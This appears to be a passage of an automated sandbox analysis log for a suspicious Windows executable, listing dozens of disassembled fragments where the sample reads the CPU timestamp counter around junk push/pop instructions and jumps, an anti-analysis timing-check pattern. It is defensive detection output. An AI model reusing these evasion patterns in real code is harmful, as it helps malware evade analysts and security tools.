Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D8B1D second address: 3D8B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F4688C1B766h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D8B2E second address: 3D8B38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4688C929D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D8C95 second address: 3D8CBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jbe 00007F4688C1B766h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D8CBD second address: 3D8CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D937A second address: 3D937E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D937E second address: 3D938C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D938C second address: 3D93A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jp 00007F4688C1B76Ch 0x0000000e jnp 00007F4688C1B766h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D94F4 second address: 3D9500 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C929D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D9500 second address: 3D951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D951A second address: 3D9531 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F4688C929D6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D9531 second address: 3D9560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3D96E8 second address: 3D96F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3DE358 second address: 3DE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3DE362 second address: 3DE366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E533B second address: 3E5349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F4688C1B766h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E565F second address: 3E5697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 push ebx 0x00000014 jo 00007F4688C929D6h 0x0000001a jno 00007F4688C929D6h 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E5697 second address: 3E569D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E569D second address: 3E56AB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E586A second address: 3E5874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E5A0A second address: 3E5A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E5A10 second address: 3E5A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E5CC0 second address: 3E5CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F4688C929E5h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E5CDF second address: 3E5CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3E5CE5 second address: 3E5D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 jng 00007F4688C929F3h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3ED0E1 second address: 3ED0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3ED21F second address: 3ED235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C929DDh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3ED235 second address: 3ED23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3ED23D second address: 3ED241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3ED39C second address: 3ED3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3ED3A0 second address: 3ED3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3ED3A6 second address: 3ED3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3EF8C7 second address: 3EF8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F4688C929D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 jp 00007F4688C929D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 32DB48 second address: 32DB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 32DB4E second address: 32DB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 32DB57 second address: 32DB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 32DB5B second address: 32DB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3FD339 second address: 3FD361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B76Bh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 push ecx 0x00000012 jbe 00007F4688C1B766h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3FD4AD second address: 3FD4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3FD4B5 second address: 3FD4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 4004F9 second address: 40051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4688C929E1h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 40051C second address: 40053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4688C1B770h 0x0000000f jmp 00007F4688C1B76Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 40053A second address: 40053F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 411FC0 second address: 411FC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 411E0B second address: 411E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4688C929EDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41B9C4 second address: 41B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41B9CA second address: 41B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41A6A9 second address: 41A6BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41A6BD second address: 41A6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41A6C3 second address: 41A6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F4688C1B76Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41A6D6 second address: 41A6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F4688C929DCh 0x0000000b jno 00007F4688C929D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41AAF1 second address: 41AAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41B71F second address: 41B72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F4688C929D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 41E331 second address: 41E33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 44076B second address: 44076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45955F second address: 459565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 459807 second address: 45980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45980C second address: 45981E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F4688C1B766h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45981E second address: 459822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 459970 second address: 459978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 459978 second address: 45997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45997C second address: 4599A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C1B766h 0x00000008 jng 00007F4688C1B766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F4688C1B770h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jc 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 4599A7 second address: 4599B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 459E99 second address: 459EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 459EA1 second address: 459EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45A00F second address: 45A013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45A013 second address: 45A023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45A023 second address: 45A027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45A027 second address: 45A04D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jo 00007F4688C929E2h 0x00000010 jg 00007F4688C929D6h 0x00000016 jo 00007F4688C929D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 je 00007F4688C929D6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45A04D second address: 45A051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45A051 second address: 45A057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 45BC55 second address: 45BC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4688C1B771h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 461552 second address: 461557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 461557 second address: 46156D instructions: 0x00000000 rdtsc 0x00000002 je 00007F4688C1B768h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007F4688C1B76Eh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 46156D second address: 46157C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 46157C second address: 4615A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 462D69 second address: 462D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410A84 second address: 5410A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410A96 second address: 5410AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA7A82DBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929DAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410AB0 second address: 5410AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410AB6 second address: 5410ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410ABA second address: 5410B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 jne 00007F46FA731043h 0x0000001d jmp 00007F4688C1B772h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F4688C1B773h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410B0D second address: 5410B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 mov di, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410B35 second address: 5410B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410B3B second address: 5410B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410B4A second address: 5410B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410B50 second address: 5410B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C929DCh 0x00000010 sbb cl, FFFFFFC8h 0x00000013 jmp 00007F4688C929DBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E6h 0x00000021 xor ah, 00000028h 0x00000024 jmp 00007F4688C929DBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410B9E second address: 5410C4F instructions: 0x00000000 rdtsc 0x00000002 call 00007F4688C1B778h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 push edx 0x00000011 mov esi, 51A8011Bh 0x00000016 pop ecx 0x00000017 popad 0x00000018 mov dword ptr [esp], ebx 0x0000001b jmp 00007F4688C1B777h 0x00000020 push dword ptr [ebp+14h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B774h 0x0000002a or esi, 01E4FC48h 0x00000030 jmp 00007F4688C1B76Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F4688C1B778h 0x0000003c sbb ax, 3EA8h 0x00000041 jmp 00007F4688C1B76Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F4688C1B76Bh 0x00000053 mov ax, 408Fh 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410CDA second address: 5410CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410CDE second address: 5410CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410CE4 second address: 5410D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007F4688C929E0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4688C929DAh 0x0000001a rdtsc
